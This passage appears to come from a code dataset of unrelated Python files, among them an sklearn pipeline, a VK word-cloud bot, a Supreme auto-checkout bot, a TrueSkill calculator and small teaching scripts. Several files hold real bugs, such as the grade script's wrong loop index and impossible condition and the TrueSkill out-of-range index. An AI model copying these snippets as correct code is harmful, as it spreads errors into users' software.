        return self
    def transform(self, X, y=None):
        # Work on a copy so the caller's DataFrame is not mutated; the
        # original wrote the new columns into X in place, which also
        # triggers pandas SettingWithCopyWarning after column selection.
        X = X.copy()
        X['hair_soul'] = X['hair_length'] * X['has_soul']
        X['flesh_soul'] = X['rotting_flesh'] * X['has_soul']
        return np.c_[X]
class DataFrameSelector(BaseEstimator, TransformerMixin):
    """Pipeline step that selects a fixed list of DataFrame columns."""
    def __init__(self, attribute_names):
        # Columns to keep, in order.
        self.attribute_names = attribute_names
    def fit(self, X, y=None):
        return self
    def transform(self, X):
        return X[self.attribute_names]
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
num_attributes = ["bone_length","rotting_flesh","hair_length","has_soul"]
cat_attributes = ["color"]
# Numeric branch: select columns, then add interaction features.
pipeline_num = Pipeline([
    ("selector",DataFrameSelector(num_attributes)),
    ("extra_feat",CreateExtraFeatures())
])
# Categorical branch: one-hot encode the color column.
pipeline_cat = Pipeline([
    ("selector", DataFrameSelector(cat_attributes)),
    ("categorical_encoder", OneHotEncoder(sparse=False))
])
from sklearn.pipeline import FeatureUnion
# NOTE(review): "pip,num" looks like a typo for "pip_num"; it only affects
# the step name, not the output.
full_pipeline = FeatureUnion([
    ("pip,num",pipeline_num),
    ("pip_cat",pipeline_cat)
])
X_train= full_pipeline.fit_transform(X_train)
# Undo the earlier train+test stacking: first 371 rows are the train set.
X_test = X_train[371:]
X_train = X_train[:371]
from sklearn.neural_network import MLPClassifier
nn_clf = MLPClassifier(max_iter=3000)
from sklearn.model_selection import GridSearchCV
grid_params = [{"hidden_layer_sizes":range(3,20), "activation":['identity', 'logistic', 'tanh', 'relu'], "solver":["lbfgs","sgd","adam"],"learning_rate":["adaptive"]}]
grid_search = GridSearchCV(nn_clf,param_grid=grid_params,cv=3,verbose=3, n_jobs=-1)
grid_search.fit(X_train,y_train)
print(grid_search.best_estimator_)
print(grid_search.best_score_)
#X_test = full_pipeline.fit_transform(test_set[num_attributes],test_set[cat_attributes].values)
y_pred = grid_search.predict(X_test)
# Map integer predictions back to label strings and write the submission.
submissions = pandas.DataFrame(y_pred, index=test_set.id,columns=["type"])
submissions["type"] = categories[submissions["type"]]
submissions.to_csv('submission.csv', index=True)
|
2,924 | 03ce69924c885e59e40689dc63e50d54b89649f7 | import _thread
import os
from queue import Queue
from threading import Thread
import random
import io
import vk_api
from vk_api.longpoll import VkLongPoll, VkEventType
from datetime import datetime, timedelta
import time
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
from wordcloud import WordCloud
import pymorphy2
from pymongo import MongoClient
import config
import matplotlib
matplotlib.use('Agg')
# Two VK sessions: the community token sends/receives group messages,
# the user token reads walls and uploads photos.
print('Connecting to VK...', end=' ')
vk_group_session = vk_api.VkApi(token=config.vk_community_token)
vk_group = vk_group_session.get_api()
vk_session = vk_api.VkApi(token=config.vk_user_token)
tools = vk_api.VkTools(vk_session)
vk = vk_session.get_api()
vk_upload = vk_api.VkUpload(vk_session)
print('Done')
print('Connecting to MongoDB...', end=' ')
collection = MongoClient(config.mongo_host)[config.mongo_db]['photos']
print('Done')
# Words excluded from clouds in addition to NLTK stopwords.
remove_words = ['год']
DIR = os.path.dirname(__file__)
# user_ids whose cloud is currently being generated (simple re-entry guard).
processing = []
# In December the "year in review" is the current year, otherwise last year.
current_year = datetime.now().year - 1 if datetime.now().month != 12 else datetime.now().year
def cloud(user_id):
    """Build a word-cloud image from a user's wall posts for current_year.

    Returns (PNG byte stream, wall posts, extracted nouns), or None when no
    usable words were found.
    """
    wall = tools.get_all('wall.get', 100, {'owner_id': user_id})['items']
    wall = list(filter(lambda x: datetime.fromtimestamp(x['date']).year == current_year, wall))
    tokenizer = RegexpTokenizer('[а-яА-ЯёЁ]+')
    morph = pymorphy2.MorphAnalyzer()
    def transform(sentence):
        # Keep nouns longer than 2 chars, normalised to lemma form with
        # 'е' substituted for 'ё'.
        return map(lambda x: morph.parse(x)[0].normal_form.replace('ё', 'е'),
                   filter(
                       lambda x: len(x) > 2 and 'NOUN' in morph.parse(x)[0].tag,
                       tokenizer.tokenize(sentence.replace('\xa0', ' '))
                   )
                   )
    top_words = []
    for post in wall:
        if 'text' in post:
            top_words.extend(transform(post['text']))
        # Reposted content counts too.
        if 'copy_history' in post:
            for copy in post['copy_history']:
                if 'text' in copy:
                    top_words.extend(transform(copy['text']))
    top_words = list(filter(lambda x: x.lower() not in remove_words, top_words))
    if not top_words:
        return
    # def color_func(word, font_size, position, orientation, random_state=None, **kwargs):
    #     return "hsl(%d, 100%%, %d%%)" % (random.randint(0, 360), random.randint(20, 50))
    def color_func(word, font_size, position, orientation, random_state=None, **kwargs):
        # Monochrome rendering.
        return "rgb(0, 0, 0)"
    sw = (stopwords.words('russian') + stopwords.words('english') + remove_words)
    wordcloud = WordCloud(
        max_words=50,
        max_font_size=500,
        background_color='white',
        margin=5,
        width=1000,
        height=1000,
        stopwords=sw,
        prefer_horizontal=0.7,
        font_path='font.ttf'
    ).generate(' '.join(top_words).lower())
    wordcloud = wordcloud.recolor(color_func=color_func, random_state=3).to_image()
    # Serialise to an in-memory PNG ready for upload.
    img_arr = io.BytesIO()
    wordcloud.save(img_arr, format='PNG')
    img_arr.seek(0)
    return img_arr, wall, top_words
def send_cloud(user_id, message, send=True):
    """Handle one incoming message: on the keyword 'облако', generate the
    user's tag cloud, upload it, optionally post it to the group wall and
    message the user.  *send*=False suppresses all outgoing messages.
    """
    # Re-entry guard: one cloud per user at a time.
    if user_id in processing:
        if send:
            vk_group.messages.send(user_id=user_id,
                                   random_id=random.randint(0, 99999999),
                                   message=f'Подожди, я составляю твое облако тегов')
        return
    if message.lower() != 'облако':
        if send:
            vk_group.messages.send(user_id=user_id,
                                   random_id=random.randint(0, 99999999),
                                   message=f'Если ты хочешь получить свое облако тегов за {current_year} '
                                           'год, отправь мне слово "облако" без кавычек 🙃')
        return
    processing.append(user_id)
    print('Generating cloud for', user_id)
    try:
        # if not vk.groups.isMember(group_id=config.group_id, user_id=user_id):
        #     vk_group.messages.send(user_id=user_id,
        #                            random_id=random.randint(0, 99999999),
        #                            message='Чтобы составить облако тегов, '
        #                                    'подпишись на меня https://vk.com/wwcloud 🙄')
        #     time.sleep(1)
        #     vk_group.messages.send(user_id=user_id,
        #                            random_id=random.randint(0, 99999999),
        #                            message='Когда будешь готов, снова отправь кодовое слово "облако" 😊')
        #     processing.remove(user_id)
        #     time.sleep(5)
        #     return
        # An empty wall cannot produce a cloud.
        if len(vk.wall.get(owner_id=user_id, count=1)['items']) == 0:
            if send:
                vk_group.messages.send(user_id=user_id,
                                       random_id=random.randint(0, 99999999),
                                       message='Похоже, у тебя недостаточно записей на стене '
                                               'для составления облака тегов☹️')
            processing.remove(user_id)
            print('Removed (1) cloud from processing for', user_id)
            time.sleep(5)
            return
        if send:
            vk_group.messages.send(user_id=user_id,
                                   random_id=random.randint(0, 99999999),
                                   message=f'Посмотрим, что тебя интересовало в {current_year} году больше всего 😋')
        user = vk.users.get(user_ids=user_id)[0]
        user_id = user['id']
        name = user['first_name'] + ' ' + user['last_name']
        clouded = cloud(user_id)
        if not clouded:
            if send:
                vk_group.messages.send(user_id=user_id,
                                       random_id=random.randint(0, 99999999),
                                       message='Похоже, у тебя недостаточно записей на стене '
                                               'для составления облака тегов ☹️')
            processing.remove(user_id)
            print('Removed (2) cloud from processing for', user_id)
            time.sleep(5)
            return
        clouded, wall, top_words = clouded
        # Upload the rendered PNG into the group's album.
        photo = vk_upload.photo(
            clouded,
            album_id=config.album_id,
            group_id=config.group_id
        )[0]
        if send:
            vk_group.messages.send(user_id=user_id,
                                   random_id=random.randint(0, 99999999), message='А вот и твое облако тегов! 🌍',
                                   attachment='photo{}_{}'.format(photo['owner_id'], photo['id']))
            vk_group.messages.send(user_id=user_id,
                                   random_id=random.randint(0, 99999999), message='Не забудь поделиться с друзьями 😉')
        post_id = None
        # Only rich clouds (100+ words) get posted to the group wall.
        if len(top_words) > 100:
            try:
                post_id = vk.wall.post(owner_id='-{}'.format(config.group_id), from_group=1,
                                       message='Облако тегов для *id{}({})'.format(user_id, name),
                                       attachments='photo{}_{}'.format(photo['owner_id'], photo['id']))['post_id']
            except Exception as e:
                # Typically the daily wall-post limit was hit.
                processing.remove(user_id)
                print(e)
                if send:
                    vk_group.messages.send(user_id=user_id,
                                           random_id=random.randint(0, 99999999),
                                           message='Похоже, я превысил лимит количества постов на сегодня 😭')
                    vk_group.messages.send(user_id=user_id,
                                           random_id=random.randint(0, 99999999),
                                           message='Создай новое облако завтра, и я выложу его на стену группы 😎')
                print('Removed (3) cloud from processing for', user_id)
        if post_id:
            # collection.insert({
            #     'user_id': user_id,
            #     'owner_id': photo['owner_id'],
            #     'id': photo['id'],
            #     'post': post_id,
            #     'timestamp': time.time(),
            #     'length': len(top_words)
            # })
            if send:
                vk_group.messages.send(user_id=user_id,
                                       random_id=random.randint(0, 99999999),
                                       attachment='wall{}_{}'.format(photo['owner_id'], post_id))
        # else:
        #     collection.insert({
        #         'user_id': user_id,
        #         'owner_id': photo['owner_id'],
        #         'id': photo['id'],
        #         'timestamp': time.time(),
        #         'length': len(top_words)
        #     })
        #     if send:
        #         vk_group.messages.send(
        #             user_id=user_id,
        #             random_id=random.randint(0, 99999999),
        #             message='Кстати, у нас в группе проходит конкурс, советую принять участие 😉',
        #             attachment='wall-136503501_467'
        #         )
        processing.remove(user_id)
        print('Finished cloud for', user_id)
    except Exception as e:
        # Always release the re-entry guard before propagating.
        processing.remove(user_id)
        print('Finished cloud for', user_id, 'with error')
        raise e
def worker(q, old=False):
    """Daemon loop: pull (callable, args, kwargs) jobs off *q* and run them.

    A failing job must not kill the worker thread, but the original's bare
    `pass` hid every error -- log the traceback instead.
    """
    while True:
        # Получаем задание из очереди
        item = q.get()
        try:
            item[0](*item[1], **item[2])
        except Exception:
            import traceback
            traceback.print_exc()
        # Сообщаем о выполненном задании
        q.task_done()
if __name__ == '__main__':
    # Pool of 10 daemon workers consuming cloud-generation jobs.
    q = Queue()
    for i in range(10):
        t = Thread(target=worker, args=(q,))
        # NOTE(review): setDaemon() is deprecated in favour of t.daemon = True.
        t.setDaemon(True)
        t.start()
    print('Initializing longpoll connection...', end=' ')
    longpoll = VkLongPoll(vk_group_session)
    print('Done')
    # Enqueue one job per new inbound message; the `processing` check here
    # is only a fast pre-filter, send_cloud re-checks it.
    for event in longpoll.listen():
        if event.to_me and event.type == VkEventType.MESSAGE_NEW and event.user_id not in processing:
            print(event.user_id, event.text)
            q.put((send_cloud, (event.user_id, event.text), {}))
    q.join()
|
2,925 | eab45dafd0366af8ab904eb33719b86777ba3d65 | import random
from .action import Action
from ..transition.step import Step
from ..value.estimators import ValueEstimator
def greedy(steps: [Step], actions: [Action], value_estimator: ValueEstimator) -> Action:
    """Return the action with the highest estimated value.

    Annotation fix: the function returns an element of *actions*, not an int.
    """
    # max() returns the first maximal element, matching the original
    # estimations.index(max(...)) tie-breaking.
    return max(actions, key=lambda action: value_estimator(steps, action))
def e_greedy(
    steps: [Step], actions: [Action], value_estimator: ValueEstimator, e: float,
) -> Action:
    """With probability *e* explore (uniform random action), otherwise
    exploit via greedy().

    Bug fix: random.sample(actions, 1) returned a one-element *list* while
    the greedy branch returned a bare action; random.choice keeps the
    return type consistent.
    """
    return (
        random.choice(actions)
        if random.uniform(0, 1) < e
        else greedy(steps, actions, value_estimator)
    )
|
2,926 | 56157aaf3f98abc58572b45111becb91cb93f328 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-24 11:30
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial auto-generated migration for the account app: Employee plus
    its multi-table-inheritance children Customer and Supplier, and the
    Item inventory model."""

    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Employee',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(blank=True, max_length=30, null=True)),
                ('last_name', models.CharField(blank=True, max_length=30, null=True)),
                ('gender', models.CharField(blank=True, max_length=10, null=True)),
                ('email', models.EmailField(blank=True, max_length=255, null=True)),
                ('phone_number', models.CharField(blank=True, max_length=20, null=True)),
                ('address', models.TextField(blank=True, max_length=255, null=True)),
                ('city', models.CharField(blank=True, max_length=50, null=True)),
                ('state', models.CharField(blank=True, max_length=50, null=True)),
                ('post_code', models.CharField(blank=True, max_length=10, null=True)),
                ('comment', models.TextField(blank=True, max_length=255, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Item',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('barcode', models.CharField(blank=True, max_length=100, null=True)),
                ('item_name', models.CharField(blank=True, max_length=100, null=True)),
                ('catagory', models.CharField(blank=True, max_length=100, null=True)),
                ('wholesale_price', models.FloatField(blank=True, null=True)),
                ('retail_price', models.FloatField(blank=True, null=True)),
                ('tax', models.FloatField(blank=True, null=True)),
                ('quantity_stock', models.IntegerField(blank=True, null=True)),
                ('receiving_quantity', models.IntegerField(blank=True, null=True)),
                ('description', models.TextField(blank=True, max_length=1000, null=True)),
                ('image', models.ImageField(blank=True, default='no-img.jpg', null=True, upload_to='item/')),
                ('item_has_serial_number', models.BooleanField(default=False)),
                ('reorder_level', models.CharField(blank=True, max_length=10, null=True)),
            ],
        ),
        # Customer/Supplier use multi-table inheritance from Employee.
        migrations.CreateModel(
            name='Customer',
            fields=[
                ('employee_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='account.Employee')),
            ],
            bases=('account.employee',),
        ),
        migrations.CreateModel(
            name='Supplier',
            fields=[
                ('employee_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='account.Employee')),
                ('company_name', models.CharField(blank=True, max_length=100, null=True)),
            ],
            bases=('account.employee',),
        ),
        migrations.AddField(
            model_name='item',
            name='supplier',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='account.Supplier'),
        ),
    ]
|
2,927 | b5581be044013df9ff812f285f99ca67c4f96a62 | import requests
import json
def get():
    """Fetch coin premium data and format it as a one-line summary string.

    Any failure (network, JSON shape, or division by zero for an exchange
    with no currencies) is caught by the broad except and turned into an
    error string rather than raised.
    """
    market = 'Premium'
    url = 'https://coinpremiums.herokuapp.com/json'
    try:
        result = ""
        premiums = requests.get(url).json()
        for exchange, exchange_currencies in premiums['premium'].items():
            result += '[[{} | '.format(exchange.title())
            _sum = 0
            _cnt = 0
            for currency_name, currency in exchange_currencies.items():
                # 'raw' is a ratio; subtract 1 to get the premium fraction.
                premium = currency['raw'] - 1
                result += '[{}] {:.2%} '.format(currency_name.upper(), premium)
                _cnt += 1
                _sum += premium
            result += '[평균] {:.2%} ]] '.format(_sum / _cnt)
    except Exception as e:
        result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.__repr__())
    return result
|
2,928 | 6a6a7cc6d4f601f4461488d02e03e832bc7ab634 | """ quiz materials for feature scaling clustering """
# FYI, the most straightforward implementation might
# throw a divide-by-zero error, if the min and max
# values are the same
# but think about this for a second--that means that every
# data point has the same value for that feature!
# why would you rescale it? Or even use it at all?
from __future__ import division
data = [115, 140, 175]
def featureScaling(arr):
    """Min-max rescale *arr* onto [0, 1]; returns None when all values are
    equal (Python 2 file: map() returns a list here).

    NOTE(review): max(*arr)/min(*arr) unpacks the sequence, so a
    single-element input raises TypeError -- max(arr) would be safer.
    """
    x_max = max(*arr)
    x_min = min(*arr)
    if (x_max == x_min):
        return None
    return map(lambda x: (x - x_min)/(x_max - x_min), arr)
# tests of your feature scaler--line below is input data
print featureScaling(data)
|
2,929 | 8fed95cf809afca7b6008d5abcdcf697367a33c2 | """
Supreme bot????
"""
import os
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
import selenium.webdriver.support.expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
# NOTE(review): paths mix macOS (chromedriver, log) and Windows (Chrome
# profile) locations -- confirm which machine this is meant to run on.
path_to_chromedriver = '/Users/Alan/Desktop/Github/SupremeBot/chromedriver'
url = "https://www.supremenewyork.com/shop/new"
path_to_log = '/Users/Alan/Desktop/'
# NOTE(review): opened in 'w' mode at import time and never closed; each
# run truncates the previous log.
log_errors = open(path_to_log + 'log_errors.txt', mode = 'w')
userProfile = "C:/Users/Alan/AppData/Local/Google/Chrome/User Data"
# Reuse the existing Chrome profile (keeps cookies/session).
chop = webdriver.ChromeOptions()
chop.add_argument("user-data-dir=C:/Users/Alan/AppData/Local/Google/Chrome/User Data")
def initDriver():
    """Start Chrome with the saved profile and open the Supreme 'new' page."""
    driver = webdriver.Chrome(executable_path=path_to_chromedriver, chrome_options=chop)
    driver.get(url)
    return driver
def buyItem(theDriver):
    """Click through to the target item; logs when the element is missing."""
    try:
        #Item you're trying to buy
        # NOTE(review): the hard-coded article index (44) breaks whenever the
        # listing changes; find_element does not raise TimeoutException, so
        # this handler likely never fires.
        item = theDriver.find_element_by_xpath('//*[@id="container"]/article[44]/div/a').click()
    except TimeoutException:
        log_errors.write('Couldn\'t locate item' + '\n')
def addCart(theDriver):
    """Wait (up to 120s) for the add-to-cart button and click it."""
    try:
        print "Adding to Cart..."
        addCart = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.NAME, 'commit')))
        print addCart.get_attribute("value")
        addCart.click()
    except TimeoutException:
        # Button never became clickable -- assume the item sold out.
        print "Sold out!"
        log_errors.write('Sold out' + '\n')
def checkout(theDriver):
    """Wait for the cart's checkout link and click it."""
    try:
        print "Checking out..."
        checkout = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="cart"]/a[2]')))
        # Small pause so the cart UI settles before the click.
        time.sleep(.25)
        checkout.click()
    except TimeoutException:
        print "Rip!"
        log_errors.write('Error' + '\n')
def fillInfo(theDriver):
    """Stub: checkout-form autofill is not implemented yet."""
    try:
        print "Entering info..."
    except TimeoutException:
        print "Error filling info"
def readAndAgree(theDriver):
    """Tick the terms checkbox (second iCheck helper on the page)."""
    try:
        print "Clicking agree..."
        #agree = theDriver.find_elements_by_css_selector('.iCheck-helper')
        #agree[1].click()
        agree = WebDriverWait(theDriver, 120).until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.iCheck-helper')))
        agree[1].click()
    except TimeoutException:
        print "Not found"
def main():
    """Run the purchase sequence, then idle so the browser stays open."""
    print "Bot running"
    driver = initDriver()
    buyItem(driver)
    addCart(driver)
    checkout(driver)
    readAndAgree(driver)
    # Keep the process (and browser) alive for manual completion.
    while True:
        time.sleep(50)
if __name__ == '__main__':
    main()
    # Unreachable: main() loops forever.
    print "Finished"
|
2,930 | 8ebc11f4b9e28254ef40175b26744f2a5ab0c831 | import os
from registration import Registration
from login import Login
def login():
    """ redirect to login page"""
    login_page = Login()
    login_page.login_main_page()
def registration():
    """Open the sign-up flow by delegating to the Registration page object."""
    Registration().registration_main_page()
# Console main menu (Python 2: raw_input / print statements).
# NOTE(review): `ch` is always a string, so `ch != 3` is always true --
# the loop terminates only via the explicit `break` on choice '3'.
if __name__ == '__main__':
    ch = ''
    while ch != 3:
        os.system('clear')  # assumes a POSIX terminal
        print "\t\t\t\t\t\t\t***** MAIN MENU *****\n\n\n"
        print "\n\t1. LOGIN \t\t\t\t\t2. REGISTER NEW USER\t\t\t\t\t\t3. EXIT\n"
        try:
            ch = str(raw_input('\n\n\t\t\t\t\tENTER YOUR RESPONSE :- '))
            if ch == '1':
                login()
            elif ch == '2':
                registration()
                continue
            elif ch == '3':
                print("\tThank You !! Visit Again")
                break
            else:
                print("WRONG CHOICE")
                os.system('clear')
                continue
        except NameError:
            # NOTE(review): raw_input returns a string, so NameError/SyntaxError
            # cannot originate from the read above; these handlers look like
            # leftovers from an input()-based version.  The value re-read here
            # is only processed on the next loop iteration.
            print("\n\tSelect Your Option between 1 to 3")
            ch = str(raw_input("\t\tEnter your choice : "))
        except SyntaxError:
            print("Select Your Option (1-3)")
            ch = str(raw_input("\tEnter your choice : "))
|
2,931 | 337311c3fbb6a8baab7a237d08152f0db9822527 |
def assert_shapes(shape, other):
    """Assert that two shape sequences match, treating None as a wildcard.

    Raises AssertionError when the lengths differ or when any pair of
    concrete (non-None) dimensions is unequal.
    """
    assert len(shape) == len(other), "Dimensions are different"
    for dim_a, dim_b in zip(shape, other):
        if dim_a is None or dim_b is None:
            continue  # a None dimension is compatible with anything
        assert dim_a == dim_b, "Shapes {} and {} are not equal".format(shape, other)
|
2,932 | bcc24d5f97e46433acb8bcfb08fe582f51eb28ce | class Coms:
def __init__(self, name, addr, coord):
    """Store a company's name, street address and map coordinate."""
    self.name = name    # company name
    self.addr = addr    # street address
    self.coord = coord  # map coordinate pair -- assumed (lat, lng); TODO confirm against callers
def getString(self):
    """Multi-line display string: company-name block then address block (Korean labels)."""
    return "회사명\n"+self.name+"\n\n주소\n"+self.addr
def getTeleString(self):
    """One-line summary ("company : X, address : Y") for Telegram messages."""
    return "회사명 : " + self.name + ", 주소 : " + self.addr
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary, url, start, end):
    """Store one job posting.

    NOTE(review): the parameter `type` shadows the builtin of the same name.
    """
    self.name = name              # posting title
    self.type = type              # employment type
    self.experience = experience  # required experience
    self.education = education    # required education
    self.keyword = keyword        # job duties / keywords
    self.salary = salary
    self.url=url
    self.start = start            # assumed posting start date -- TODO confirm
    self.end = end                # assumed posting end date -- TODO confirm
def getString(self):
    """Full multi-line description of the posting with Korean field labels."""
    return "공고명 : " + self.name + "\n채용형태 : " + self.type + "\n경력 : " + self.experience + "\n학력 : " + self.education + "\n업무 : " + self.keyword + "\n연봉 : " + self.salary
def getTeleString(self):
return "공고명 : " + self.name |
2,933 | 5d654c056e6ef01e72821427c4f8dcb285755ee9 | from .data_processing import make_request_data, clear_request_data, get_token_from_text
from .review import Review |
2,934 | ec604aea28dfb2909ac9e4b0f15e6b5bbe1c3446 | from email.mime.text import MIMEText
import smtplib
def init_mail(server, user, pwd, port=25):
    """Open an authenticated SMTP connection.

    Connects to *server*:*port*, upgrades the session with STARTTLS, logs in
    with *user*/*pwd* and returns the live smtplib.SMTP connection.

    Fix: the original rebound the `server` parameter to the connection
    object, shadowing the hostname argument; a distinct local is used now.
    """
    conn = smtplib.SMTP(server, port)
    conn.starttls()
    conn.login(user, pwd)
    return conn
def send_email(mconn, mailto, mailfrom, mailsub, msgbody):
    """Build a plain-text MIME message, send it over *mconn*, then quit.

    Note that the connection is closed after the single send, so a fresh
    connection (see init_mail) is needed per message.
    """
    message = MIMEText(msgbody)
    message['Subject'], message['To'], message['From'] = mailsub, mailto, mailfrom
    mconn.sendmail(mailfrom, mailto, message.as_string())
    mconn.quit()
|
2,935 | 009be282e45d191eb8f4d7d2986a2f182d64c1dd | from layers import TrueSkillFactorGraph
from math import e, sqrt
from numerics import atLeast, _Vector, _DiagonalMatrix, Matrix
from objects import SkillCalculator, SupportedOptions, argumentNotNone, \
getPartialPlayPercentage, sortByRank
class FactorGraphTrueSkillCalculator(SkillCalculator):
    """TrueSkill calculator backed by a full factor graph.

    Supports partial play and partial update, for two or more teams of one
    or more players each (see the SupportedOptions / atLeast arguments).
    """

    def __init__(self):
        super(FactorGraphTrueSkillCalculator, self).__init__(SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE, atLeast(2), atLeast(1))

    def calculateNewRatings(self, gameInfo, teams, teamRanks):
        """Return updated ratings for *teams* given their finishing *teamRanks*."""
        argumentNotNone(gameInfo, "gameInfo")
        self._validateTeamCountAndPlayersCountPerTeam(teams)
        # Teams are processed in rank order by the factor-graph schedule.
        teams, teamRanks = sortByRank(teams, teamRanks)
        factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
        factorGraph.buildGraph()
        factorGraph.runSchedule()
        return factorGraph.getUpdatedRatings()

    def calculateMatchQuality(self, gameInfo, teams):
        """Return a match-quality scalar for *teams*.

        Computes exp(-0.5 * mu^T A (beta^2 A^T A + A^T S A)^-1 A^T mu)
        * sqrt(det(beta^2 A^T A) / det(beta^2 A^T A + A^T S A)), where A is
        the team-assignment matrix, mu the mean vector and S the (diagonal)
        skill covariance -- this appears to be the closed-form draw
        probability from the TrueSkill paper; confirm against the reference.
        """
        skillsMatrix = self._getPlayerCovarianceMatrix(teams)
        meanVector = self._getPlayerMeansVector(teams)
        meanVectorTranspose = meanVector.transpose
        playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(teams, meanVector.rows)
        playerTeamAssignmentsMatrixTranspose = playerTeamAssignmentsMatrix.transpose
        betaSquared = gameInfo.beta**2.0
        start = meanVectorTranspose * playerTeamAssignmentsMatrix
        aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose) * playerTeamAssignmentsMatrix
        aTSA = playerTeamAssignmentsMatrixTranspose * skillsMatrix * playerTeamAssignmentsMatrix
        middle = aTa + aTSA
        middleInverse = middle.inverse
        end = playerTeamAssignmentsMatrixTranspose * meanVector
        expPartMatrix = (start * middleInverse * end) * -0.5
        expPart = expPartMatrix.determinant  # 1x1 matrix collapsed to a scalar via its determinant
        sqrtPartNumerator = aTa.determinant
        sqrtPartDenominator = middle.determinant
        sqrtPart = sqrtPartNumerator / sqrtPartDenominator
        result = (e**expPart) * sqrt(sqrtPart)
        return result

    def _getPlayerMeansVector(self, teamAssignmentsList):
        """Column vector of every player's skill mean, in team order."""
        return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.mean))

    def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
        """Diagonal covariance matrix of every player's skill variance (sigma^2)."""
        return _DiagonalMatrix(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.standardDeviation**2.0))

    def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
        """Flatten all teams' ratings into one list via *playerRatingFunction*."""
        playerRatingValues = list()
        for currentTeam in teamAssigmentsList:
            for currentRating in currentTeam.values:
                playerRatingValues.append(playerRatingFunction(currentRating))
        return playerRatingValues

    def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList, totalPlayers):
        """Build the players x (teams - 1) assignment matrix A.

        Each column encodes one adjacent team pairing: +partialPlay for the
        current team's players, -partialPlay for the next team's players.

        NOTE(review): the loop runs over every index i but reads
        teamAssignmentsList[i + 1], which indexes past the end on the final
        iteration; reference implementations iterate only to len - 1.
        Confirm whether the Matrix(..., len - 1, ...) truncation masks this.
        """
        playerAssignments = list()
        totalPreviousPlayers = 0
        for i in range(len(teamAssignmentsList)):
            currentTeam = teamAssignmentsList[i]
            currentRowValues = [0] * totalPreviousPlayers  # leading zeros for players already placed
            playerAssignments.append(currentRowValues)
            for currentRating in currentTeam:
                currentRowValues.append(getPartialPlayPercentage(currentRating[0]))
                totalPreviousPlayers += 1
            nextTeam = teamAssignmentsList[i + 1]
            for nextTeamPlayerPair in nextTeam:
                currentRowValues.append(-1 * getPartialPlayPercentage(nextTeamPlayerPair[0]))
        return Matrix(totalPlayers, len(teamAssignmentsList) - 1, playerAssignments)
|
2,936 | 0a5570ef17efa26ef6317930df616c8326f83314 | # Generated by Django 3.0.1 on 2020-02-01 16:38
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds a required `location` CharField to the `order` model.

    preserve_default=False means the 'dhaka,Mohammadpur' value exists only
    to backfill existing rows during this migration.
    """

    dependencies = [
        ('shopUser', '0024_order_contact'),
    ]

    operations = [
        migrations.AddField(
            model_name='order',
            name='location',
            field=models.CharField(default='dhaka,Mohammadpur', max_length=200),
            preserve_default=False,
        ),
    ]
|
2,937 | cf4582f4d0c6c94e617270a45425fe0b770142e0 | # coding: utf-8
"""
最简单的计数器,仅仅为了展示基本方式
"""
import tensorflow as tf
# 创建一个变量, 初始化为标量 0
state = tf.Variable(0, name="counter")
# 创建一个operation, 其作用是使state 增加 1
one = tf.constant(1)
new_value = tf.add(state, one)
update = tf.assign(state, new_value) # 这样才能重复执行+1的操作,实际上就代表:state=new_value
# 启动图后, 变量必须先经过`初始化` (init) op 初始化,
# 首先必须增加一个`初始化` op 到图中.
init_op = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init_op) # 运行 init_op
print(sess.run(state)) # 打印出事状态
for _ in range(10):
sess.run(new_value)
print(sess.run(new_value))
|
2,938 | 1cc9c89182f69a5f1eb9a0e7f3433dc30c8d7035 |
print("calificacion de los alumnos")
lista2_calificaciones=[]
for i in range (0,5):
lista2_calificaciones.append(int(input(f"ingrese la calificacion corresponfiente al alumno")))
print(lista2_calificaciones)
for n in range(0,len(lista2_calificaciones)):
if lista2_calificaciones[i] >=0 and lista2_calificaciones[i]<=5:
print("valor insuficiente, repetir el curso")
else:
if lista2_calificaciones[i] >5 and lista2_calificaciones[i]<=7:
print("Valor es aprobatorio")
else:
if lista2_calificaciones[i]>7 and lista2_calificaciones[i]<9:
print("valor es notable")
else:
if lista2_calificaciones[i] ==9 and lista2_calificaciones[i]==10:
print("el valor es notable")
else:
print("Valor muy alto vuelvalo a intentar")
|
2,939 | fef1273552350bfaf075d90279c9f10a965cae25 | # Accepted
def bubble_sort(a_list, n):
    """Sort *a_list* (length *n*) in place with bubble sort.

    Each pass bubbles the smallest remaining element leftward by scanning
    the unsorted suffix from the back.  Returns the (same, now sorted) list
    and the number of adjacent swaps performed, which equals the number of
    inversions in the input.
    """
    swap_count = 0
    for done in range(n):
        # Compare pairs (k, k+1) from the right edge down to position `done`.
